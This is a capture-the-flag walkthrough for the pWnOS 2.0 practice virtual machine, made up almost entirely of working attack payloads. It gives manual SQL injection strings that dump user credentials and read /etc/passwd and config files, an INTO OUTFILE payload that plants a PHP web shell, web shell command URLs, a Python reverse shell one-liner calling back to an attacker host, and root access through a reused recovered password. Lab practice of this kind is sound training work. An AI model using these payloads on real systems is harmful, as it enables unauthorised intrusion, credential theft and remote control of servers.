pWnOS 2.0 (Manual SQLi)

pWnOS 2.0

Goal:

Get root... Win!

About:

pWnOS v2.0 is a Virutal Machine Image which hosts a server to pratice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was design to be used with WMWare Workstation 7.0, but can also be used with most other virtual machine software.

Configuration & Setup:

Configure your attacking platform to be within the 10.10.10.0/24 network range

The server's ip is staticaly set to 10.10.10.100
Server's Network Settings:
IP: 10.10.10.100
Netmask: 255.255.255.0
Gateway: 10.10.10.15

pWnOS 2.0 VM Download

Walkthrough Video

Notes


//intercept post request using burpsuite
//alter post data

email='&pass=pass&submit=Login&submitted=TRUE

email=' order by 1-- -&pass=pass&submit=Login&submitted=TRUE
email=' order by 9-- -&pass=pass&submit=Login&submitted=TRUE
//MySQL Error: Unknown column '9' in 'order clause

email=' union select 1,2,3,4,5,6,7,8-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,@@version,5,6,7,8-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,user(),5,6,7,8-- -&pass=pass&submit=Login&submitted=TRUE

email=' union select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_name='users'-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,group_concat(user_id,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select 1,2,3,group_concat(user_id,0x3a,first_name,0x3a,last_name,0x3a,email,0x3a,pass,0x3a,user_level,0x3a),5,6,7,8 from users-- -&pass=pass&submit=Login&submitted=TRUE

email=' union select null,null,null,load_file('/etc/passwd'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select null,null,null,load_file('/var/www/login.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select null,null,null,load_file('/var/www/includes/config.inc.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
email=' union select null,null,null,load_file('/var/www/mysqli_connect.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE
//mysql -->user passwd: root goodday

//write php shell onto disk
email=' union select null,null,null,"<?php system($_GET['cmd']);?>",null,null,null,null into outfile '/var/www/shell.php'-- -&pass=pass&submit=Login&submitted=TRUE

//confirm shell is written to webserver root
email=' union select null,null,null,load_file('/var/www/shell.php'),null,null,null,null-- -&pass=pass&submit=Login&submitted=TRUE

//shell can be accessed at http://10.10.10.100/shell.php?cmd=[command]
http://10.10.10.100/shell.php?cmd=id
http://10.10.10.100/shell.php?cmd=uname -a
http://10.10.10.100/shell.php?cmd=which python

//python reverse shell one liner
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.50",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

//privilege escalation
/var/mysqli_connect.php has root password
ssh using this password